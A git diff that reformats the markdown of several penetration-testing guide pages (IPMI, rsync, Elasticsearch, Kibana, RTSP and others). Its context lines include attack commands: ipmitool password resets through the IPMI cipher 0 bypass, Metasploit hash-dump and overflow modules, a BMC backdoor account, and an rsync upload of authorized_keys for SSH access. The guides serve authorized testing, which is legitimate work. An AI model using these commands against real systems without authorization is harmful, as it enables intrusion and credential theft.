diff --git a/pentesting/554-8554-pentesting-rtsp.md b/pentesting/554-8554-pentesting-rtsp.md
index 77fab073..9cd278f5 100644
--- a/pentesting/554-8554-pentesting-rtsp.md
+++ b/pentesting/554-8554-pentesting-rtsp.md
@@ -6,7 +6,7 @@
 >
 > The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol (RTP) in conjunction with Real-time Control Protocol (RTCP) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport (RDT).
 
-From [wikipedia](https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol).
+From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol).
 
 **Default ports:** 554,8554
 
@@ -55,7 +55,7 @@ print data
 
 Voila! You have access.
 
-**From: **[**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)****
+**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)****
 
 ## Enumeration
 
@@ -69,11 +69,11 @@ nmap -sV --scripts "rtsp-*" -p <PORT> <IP>
 
 ### **Other useful programs**
 
-To bruteforce: [https://github.com/Tek-Security-Group/rtsp_authgrinder](https://github.com/Tek-Security-Group/rtsp_authgrinder)
+To bruteforce: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder)
 
 **Cameradar**
 
-Cameradar allows you to: 
+Cameradar allows you to:&#x20;
 
 * Detect open RTSP hosts on any accessible target
 * Get their public info (hostname, port, camera model, etc.)
diff --git a/pentesting/5601-pentesting-kibana.md b/pentesting/5601-pentesting-kibana.md
index 03bf5251..0581f68f 100644
--- a/pentesting/5601-pentesting-kibana.md
+++ b/pentesting/5601-pentesting-kibana.md
@@ -6,15 +6,15 @@ Kibana provides search and data visualization capabilities for data indexed in E
 
 ### Authentication?
 
-Authentication in Kibana is linked to the** credentials from **[**Elasticsearch**](9200-pentesting-elasticsearch.md). If **authentication **is **disabled **in **Elasticsearch**, **Kibana **also should be **accessible without credentials**. Otherwise the **same credentials valid for Elasticsearch** should be working when logging in to Kibana. The **rights **of the **users **in **Elasticsearch **are the **same **as in **Kibana**.
+Authentication in Kibana is linked to the **credentials from** [**Elasticsearch**](9200-pentesting-elasticsearch.md). If **authentication** is **disabled** in **Elasticsearch**, **Kibana** also should be **accessible without credentials**. Otherwise the **same credentials valid for Elasticsearch** should be working when logging in to Kibana. The **rights** of the **users** in **Elasticsearch** are the **same** as in **Kibana**.
 
-You might find credentials in the configuration file **/etc/kibana/kibana.yml**. If those credentials are not for the user **kibana_system**, it should be tried to use them for accessing further data. They could have more rights then the **kibana_system** user, which only has access to the monitoring API and the **.kibana** index.
+You might find credentials in the configuration file **/etc/kibana/kibana.yml**. If those credentials are not for the user **kibana\_system**, it should be tried to use them for accessing further data. They could have more rights then the **kibana\_system** user, which only has access to the monitoring API and the **.kibana** index.
 
 ### Having Access?
 
 When having access to Kibana you can do several things:
 
-* Try to **access data **from **Elasticsearch**
+* Try to **access data** from **Elasticsearch**
 * Check if you can access the users panel and if you can e**dit, delete or create new users,** roles or API Keys (Stack Management -> Users/Roles/API Keys)
 * Check the current version for vulnerabilities (**There was a RCE vulnerability in 2019 for Kibana versions < 6.6.0** \[[2](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)])
 
diff --git a/pentesting/5671-5672-pentesting-amqp.md b/pentesting/5671-5672-pentesting-amqp.md
index c5a7dedd..edbe64a6 100644
--- a/pentesting/5671-5672-pentesting-amqp.md
+++ b/pentesting/5671-5672-pentesting-amqp.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-**RabbitMQ **is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\
+**RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\
 A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\
 Definition from [here](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html).
 
@@ -50,7 +50,7 @@ PORT     STATE SERVICE VERSION
 
 ## Other RabbitMQ ports
 
-From [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that** rabbitmq uses several ports**:
+From [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**:
 
 * **1883, 8883**: ([MQTT clients](http://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md).
 * **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
diff --git a/pentesting/584-pentesting-afp.md b/pentesting/584-pentesting-afp.md
index f1f6eeb3..6ffbde21 100644
--- a/pentesting/584-pentesting-afp.md
+++ b/pentesting/584-pentesting-afp.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** (**AFS**), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported**. **AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services.
+The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** (**AFS**), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported**.** AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services.
 
 **Default port:** 548
 
diff --git a/pentesting/623-udp-ipmi.md b/pentesting/623-udp-ipmi.md
index 98610368..128023ec 100644
--- a/pentesting/623-udp-ipmi.md
+++ b/pentesting/623-udp-ipmi.md
@@ -1,6 +1,6 @@
 # 623/UDP/TCP - IPMI
 
-**Information taken from **[**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)****
+**Information taken from** [**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)****
 
 ## Basic Information
 
@@ -20,7 +20,7 @@ nmap -n-sU -p 623 10.0.0./24
 use  auxiliary/scanner/ipmi/ipmi_version
 ```
 
-You can **identify **the **version **using:
+You can **identify** the **version** using:
 
 ```bash
 use auxiliary/scanner/ipmi/ipmi_version
@@ -28,16 +28,16 @@ use auxiliary/scanner/ipmi/ipmi_version
 
 ### Vulnerability - IPMI Authentication Bypass via Cipher 0
 
-Dan Farmer [identified a serious failing](http://fish2.com/ipmi/cipherzero.html) of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually** allows access with any password**. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.\
+Dan Farmer [identified a serious failing](http://fish2.com/ipmi/cipherzero.html) of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually **allows access with any password**. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.\
 Note that to exploit this issue you first need to **find a valid user**.
 
-You can **identify **this issue using:
+You can **identify** this issue using:
 
 ```
 use auxiliary/scanner/ipmi/ipmi_cipher_zero
 ```
 
-And you can **abuse **this issue with `ipmitool`:
+And you can **abuse** this issue with `ipmitool`:
 
 ```bash
 apt-get install ipmitool #Install
@@ -51,7 +51,7 @@ ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
 
 ### Vulnerability - IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
 
-Basically,** you can ask the server for the hashes MD5 and SHA1 of any username and if the username exists those hashes will be sent back. **Yeah, as amazing as it sounds. And there is a **metasploit module **for testing this (you can select the output in John or Hashcat format):
+Basically, **you can ask the server for the hashes MD5 and SHA1 of any username and if the username exists those hashes will be sent back.** Yeah, as amazing as it sounds. And there is a **metasploit module** for testing this (you can select the output in John or Hashcat format):
 
 ```bash
 msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
@@ -72,7 +72,7 @@ root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set pass
 
 ### Vulnerability - IPMI Anonymous Authentication
 
- In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user **account to a **null string **and **setting **a **null password **to match. The _ipmi_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool `to reset the password of a named user account **and leverage that account for access to other services:
+&#x20;In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services:
 
 ```bash
 ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
@@ -87,7 +87,7 @@ ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword #Ch
 
 ### Vulnerability - Supermicro IPMI Clear-text Passwords
 
-The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentication methods such as SHA1 and MD5. This authentication process has some serious weaknesses, as demonstrated in previous examples, but also** requires access to the clear-text password in order to calculate the authentication hash**. This means that the BMC must store a **clear-text version** of all configured user passwords somewhere in **non-volatile storage**. In the case of **Supermicro**, this location changes between firmware versions, but is either **`/nv/PSBlock`** or **`/nv/PSStore`**. The passwords are scattered between various binary blobs, but easy to pick out as they always follow the username. This is a serious issue for any organization that uses shared passwords between BMCs or even different types of devices.
+The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentication methods such as SHA1 and MD5. This authentication process has some serious weaknesses, as demonstrated in previous examples, but also **requires access to the clear-text password in order to calculate the authentication hash**. This means that the BMC must store a **clear-text version** of all configured user passwords somewhere in **non-volatile storage**. In the case of **Supermicro**, this location changes between firmware versions, but is either **`/nv/PSBlock`** or **`/nv/PSStore`**. The passwords are scattered between various binary blobs, but easy to pick out as they always follow the username. This is a serious issue for any organization that uses shared passwords between BMCs or even different types of devices.
 
 ```bash
  cat /nv/PSBlock
@@ -96,7 +96,7 @@ The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentic
 
 ### Vulnerability - Supermicro IPMI UPnP
 
-Supermicro includes a **UPnP SSDP listener running on UDP port 1900** on the IPMI firmware of many of its recent motherboards. On versions prior to SMT_X9\_218 this service was running the Intel SDK for UPnP Devices, version 1.3.1. This version is vulnerable to [the issues Rapid7 disclosed](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) in February of 2013, and an exploit target for this platform is part of the Metasploit Framework. The interesting thing about this attack is that it **yields complete root access to the BMC**, something that is otherwise difficult to obtain. Keep in mind than an attacker with administrative access, either over the network or from a root shell on the host system, can downgrade the firmware of a Supermicro BMC to a vulnerable version and then exploit it. Once **root **access is **obtained**, it is possible to **read cleartext credentials **from the file system, **install **additional **software**, and integrate permanent **backdoors **into the BMC that would survive a full reinstall of the host's operating system.
+Supermicro includes a **UPnP SSDP listener running on UDP port 1900** on the IPMI firmware of many of its recent motherboards. On versions prior to SMT\_X9\_218 this service was running the Intel SDK for UPnP Devices, version 1.3.1. This version is vulnerable to [the issues Rapid7 disclosed](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) in February of 2013, and an exploit target for this platform is part of the Metasploit Framework. The interesting thing about this attack is that it **yields complete root access to the BMC**, something that is otherwise difficult to obtain. Keep in mind than an attacker with administrative access, either over the network or from a root shell on the host system, can downgrade the firmware of a Supermicro BMC to a vulnerable version and then exploit it. Once **root** access is **obtained**, it is possible to **read cleartext credentials** from the file system, **install** additional **software**, and integrate permanent **backdoors** into the BMC that would survive a full reinstall of the host's operating system.
 
 ```bash
 msf> use exploit/multi/upnp/libupnp_ssdp_overflow
@@ -120,17 +120,17 @@ Note that only HP randomizes the password during the manufacturing process.
 
 Once administrative access to the BMC is obtained, there are a number of methods available that can be used to gain access to the host operating system. The most direct path is to abuse the BMCs KVM functionality and reboot the host to a root shell (init=/bin/sh in GRUB) or specify a rescue disk as a virtual CD-ROM and boot to that. Once raw access to the host's disk is obtained, it is trivial to introduce a backdoor, copy data from the hard drive, or generally do anything needing doing as part of the security assessment. The big downside, of course, is that the host has to be rebooted to use this method. Gaining access to the host running is much trickier and depends on what the host is running. If the physical console of the host is left logged in, it becomes trivial to hijack this using the built-in KVM functionality. The same applies to serial consoles - if the serial port is connected to an authenticated session, the BMC may allow this port to be hijacked using the ipmitool interface for serial-over-LAN (sol). One path that still needs more research is abusing access to shared hardware, such as the i2c bus and the Super I/O chip.
 
-![](https://blog.rapid7.com/content/images/post-images/27966/ipmi_bios.png)
+![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_bios.png)
 
 
 
-![](https://blog.rapid7.com/content/images/post-images/27966/ipmi_boot.png)
+![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png)
 
 ![](<../.gitbook/assets/image (202) (2).png>)
 
 ## Exploiting the BMC from the Host
 
-In situations where a host with a BMC has been compromised, the** local interface to the BMC can be used to introduce a backdoor user account**, and from there establish a permanent foothold on the server. This attack requires the **`ipmitool `**to be installed on the host and driver support to be enabled for the BMC. The example below demonstrates how the local interface on the host, which does not require authentication, can be used to inject a new user account into the BMC. This method is universal across Linux, Windows, BSD, and even DOS targets.
+In situations where a host with a BMC has been compromised, the **local interface to the BMC can be used to introduce a backdoor user account**, and from there establish a permanent foothold on the server. This attack requires the **`ipmitool`** to be installed on the host and driver support to be enabled for the BMC. The example below demonstrates how the local interface on the host, which does not require authentication, can be used to inject a new user account into the BMC. This method is universal across Linux, Windows, BSD, and even DOS targets.
 
 ```bash
 ipmitool user list
diff --git a/pentesting/69-udp-tftp.md b/pentesting/69-udp-tftp.md
index 973f1652..d4fa0793 100644
--- a/pentesting/69-udp-tftp.md
+++ b/pentesting/69-udp-tftp.md
@@ -2,9 +2,9 @@
 
 ## Basic Information
 
-**TFTP **uses UDP port 69 and **requires no authentication**—clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.
+**TFTP** uses UDP port 69 and **requires no authentication**—clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.
 
-**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass)** **(or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
+**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass) **** (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
 
 **Default Port:** 69/UDP
 
diff --git a/pentesting/7-tcp-udp-pentesting-echo.md b/pentesting/7-tcp-udp-pentesting-echo.md
index 6c2a428f..54e74c48 100644
--- a/pentesting/7-tcp-udp-pentesting-echo.md
+++ b/pentesting/7-tcp-udp-pentesting-echo.md
@@ -6,7 +6,7 @@ An echo service is running on this host. The echo service was intended for testi
 **It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.\
 Info from [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)
 
-**Default Port: **7/tcp/udp
+**Default Port:** 7/tcp/udp
 
 ```
 PORT   STATE SERVICE
@@ -28,6 +28,6 @@ Hello echo    #This is the response
 
 ## References
 
-[Wikipedia echo](http://en.wikipedia.org/wiki/ECHO_protocol)
+[Wikipedia echo](http://en.wikipedia.org/wiki/ECHO\_protocol)
 
 [CA-1996-01 UDP Port Denial-of-Service Attack](http://www.cert.org/advisories/CA-1996-01.html)
diff --git a/pentesting/8086-pentesting-influxdb.md b/pentesting/8086-pentesting-influxdb.md
index b5061434..163b83d4 100644
--- a/pentesting/8086-pentesting-influxdb.md
+++ b/pentesting/8086-pentesting-influxdb.md
@@ -6,7 +6,7 @@
 
 A **time series database (TSDB)** is a software system that is optimized for storing and **serving time series** through associated pairs of time(s) and value(s).
 
-Time series datasets are** relatively large and uniform compared to other datasets**―usually being composed of a timestamp and associated data. Time series datasets can also have fewer relationships between data entries in different tables and don't require indefinite storage of entries. The unique properties of time series datasets mean that time series databases can provide **significant improvements in storage space and performance over general purpose databases**. For instance, due to the uniformity of time series data, **specialized compression algorithms** can provide improvements over regular compression algorithms designed to work on less uniform data. Time series databases can also be **configured to regularly delete old data**, unlike regular databases which are designed to store data indefinitely. Special database indices can also provide boosts in query performance. (From [here](https://en.wikipedia.org/wiki/Time\_series\_database)).
+Time series datasets are **relatively large and uniform compared to other datasets**―usually being composed of a timestamp and associated data. Time series datasets can also have fewer relationships between data entries in different tables and don't require indefinite storage of entries. The unique properties of time series datasets mean that time series databases can provide **significant improvements in storage space and performance over general purpose databases**. For instance, due to the uniformity of time series data, **specialized compression algorithms** can provide improvements over regular compression algorithms designed to work on less uniform data. Time series databases can also be **configured to regularly delete old data**, unlike regular databases which are designed to store data indefinitely. Special database indices can also provide boosts in query performance. (From [here](https://en.wikipedia.org/wiki/Time\_series\_database)).
 
 **Default port**: 8086
 
@@ -43,7 +43,7 @@ The information of this example was taken from [**here**](https://oznetnerd.com/
 
 #### Show databases
 
-The found databases are _telegraf _and _\_internal _(you will find this one everywhere)
+The found databases are _telegraf_ and _\_internal_ (you will find this one everywhere)
 
 ```bash
 > show databases
@@ -75,7 +75,7 @@ system
 
 #### Show columns/field keys
 
-The field keys are like the **columns **of the database
+The field keys are like the **columns** of the database
 
 ```bash
 > show field keys
@@ -100,7 +100,7 @@ inodes_used  integer
 
 #### Dump Table
 
-And finally you can **dump the table **doing something like
+And finally you can **dump the table** doing something like
 
 ```bash
 select * from cpu
diff --git a/pentesting/8089-splunkd.md b/pentesting/8089-splunkd.md
index 1187442f..3534b777 100644
--- a/pentesting/8089-splunkd.md
+++ b/pentesting/8089-splunkd.md
@@ -1,6 +1,6 @@
-# 8089 - Splunkd
+# 8089 - Pentesting Splunkd
 
-**Default port: **8089
+**Default port:** 8089
 
 ```
 PORT     STATE SERVICE VERSION
diff --git a/pentesting/873-pentesting-rsync.md b/pentesting/873-pentesting-rsync.md
index e87a79a2..e5e248eb 100644
--- a/pentesting/873-pentesting-rsync.md
+++ b/pentesting/873-pentesting-rsync.md
@@ -2,7 +2,7 @@
 
 ## **Basic Information**
 
-> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
+> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
 
 From [wikipedia](https://en.wikipedia.org/wiki/Rsync).
 
@@ -52,19 +52,19 @@ rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
 ```
 
 Notice that it could be configured a shared name to not be listed. So there could be something **hidden**.\
-Notice that it may be some **shared names** being listed where you need some (different) **credentials **to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those.
+Notice that it may be some **shared names** being listed where you need some (different) **credentials** to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those.
 
 ### ****[**Brute force**](../brute-force.md#rsync)
 
 ### Manual Rsync
 
-Once you have the **list of modules** you have a few different options depending on the actions you want to take and whether or not authentication is required. **If authentication is not required **you can **list **a shared folder:
+Once you have the **list of modules** you have a few different options depending on the actions you want to take and whether or not authentication is required. **If authentication is not required** you can **list** a shared folder:
 
 ```bash
 rsync -av --list-only rsync://192.168.0.123/shared_name
 ```
 
-And **copy **all **files **to your local machine via the following command:
+And **copy** all **files** to your local machine via the following command:
 
 ```bash
 rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
@@ -72,14 +72,14 @@ rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
 
 This **recursively transfers all files from the directory** `<shared_name>` on the machine `<IP>`into the `./rsync_shared` directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.
 
-If you **have credentials **you can **list/download** a **shared name **using (the password will be prompted):
+If you **have credentials** you can **list/download** a **shared name** using (the password will be prompted):
 
 ```bash
 rsync -av --list-only rsync://username@192.168.0.123/shared_name
 rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
 ```
 
-You could also **upload **some **content **using rsync (for example, in this case we can upload an _**authorized_keys **_file to obtain access to the box):
+You could also **upload** some **content** using rsync (for example, in this case we can upload an _**authorized\_keys**_ file to obtain access to the box):
 
 ```bash
 rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
diff --git a/pentesting/9000-pentesting-fastcgi.md b/pentesting/9000-pentesting-fastcgi.md
index 590f74ea..9dffa251 100644
--- a/pentesting/9000-pentesting-fastcgi.md
+++ b/pentesting/9000-pentesting-fastcgi.md
@@ -5,10 +5,10 @@
 If you want to **learn what is FastCGI** check the following page:
 
 {% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %}
-[disable_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md)
+[disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md)
 {% endcontent-ref %}
 
-By default **FastCGI **run in **port** **9000 **and isn't recognized by nmap. **Usually **FastCGI only listen in **localhost**.
+By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**.
 
 ## RCE
 
diff --git a/pentesting/9100-pjl.md b/pentesting/9100-pjl.md
index 3caac843..4d6840e2 100644
--- a/pentesting/9100-pjl.md
+++ b/pentesting/9100-pjl.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access **to **results **of **PJL**, **PostScript **or **PCL **commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. (From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing))
+Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. (From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing))
 
 If you want to learn more about [**hacking printers read this page**](pentesting-printers/).
 
diff --git a/pentesting/9200-pentesting-elasticsearch.md b/pentesting/9200-pentesting-elasticsearch.md
index 90c92497..a5f639d2 100644
--- a/pentesting/9200-pentesting-elasticsearch.md
+++ b/pentesting/9200-pentesting-elasticsearch.md
@@ -43,8 +43,8 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
 {"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
 ```
 
-That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch)** **(it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
-Here you have a **list default usernames**: _**elastic **(superuser), remote_monitoring_user, beats_system, logstash_system, kibana, kibana_system, apm_system, _ \_anonymous_. _Older versions of Elasticsearch have the default password **changeme** for this user
+That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) **** (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
+Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous_._ Older versions of Elasticsearch have the default password **changeme** for this user
 
 ```
 curl -X GET http://user:password@IP:9200/
@@ -65,39 +65,39 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
 
 ### Elastic Info
 
-Here are some endpoints that you can **access via GET** to **obtain **some **information **about elasticsearch:
+Here are some endpoints that you can **access via GET** to **obtain** some **information** about elasticsearch:
 
-| \_cat                          | /\_cluster                    | /\_security              |
-| ------------------------------ | ----------------------------- | ------------------------ |
-| /\_cat/segments                | /\_cluster/allocation/explain | /\_security/user         |
-| /\_cat/shards                  | /\_cluster/settings           | /\_security/privilege    |
-| /\_cat/repositories            | /\_cluster/health             | /\_security/role_mapping |
-| /\_cat/recovery                | /\_cluster/state              | /\_security/role         |
-| /\_cat/plugins                 | /\_cluster/stats              | /\_security/api_key      |
-| /\_cat/pending_tasks           | /\_cluster/pending_tasks      |                          |
-| /\_cat/nodes                   | /\_nodes                      |                          |
-| /\_cat/tasks                   | /\_nodes/usage                |                          |
-| /\_cat/templates               | /\_nodes/hot_threads          |                          |
-| /\_cat/thread_pool             | /\_nodes/stats                |                          |
-| /\_cat/ml/trained_models       | /\_tasks                      |                          |
-| /\_cat/transforms/\_all        | /\_remote/info                |                          |
-| /\_cat/aliases                 |                               |                          |
-| /\_cat/allocation              |                               |                          |
-| /\_cat/ml/anomaly_detectors    |                               |                          |
-| /\_cat/count                   |                               |                          |
-| /\_cat/ml/data_frame/analytics |                               |                          |
-| /\_cat/ml/datafeeds            |                               |                          |
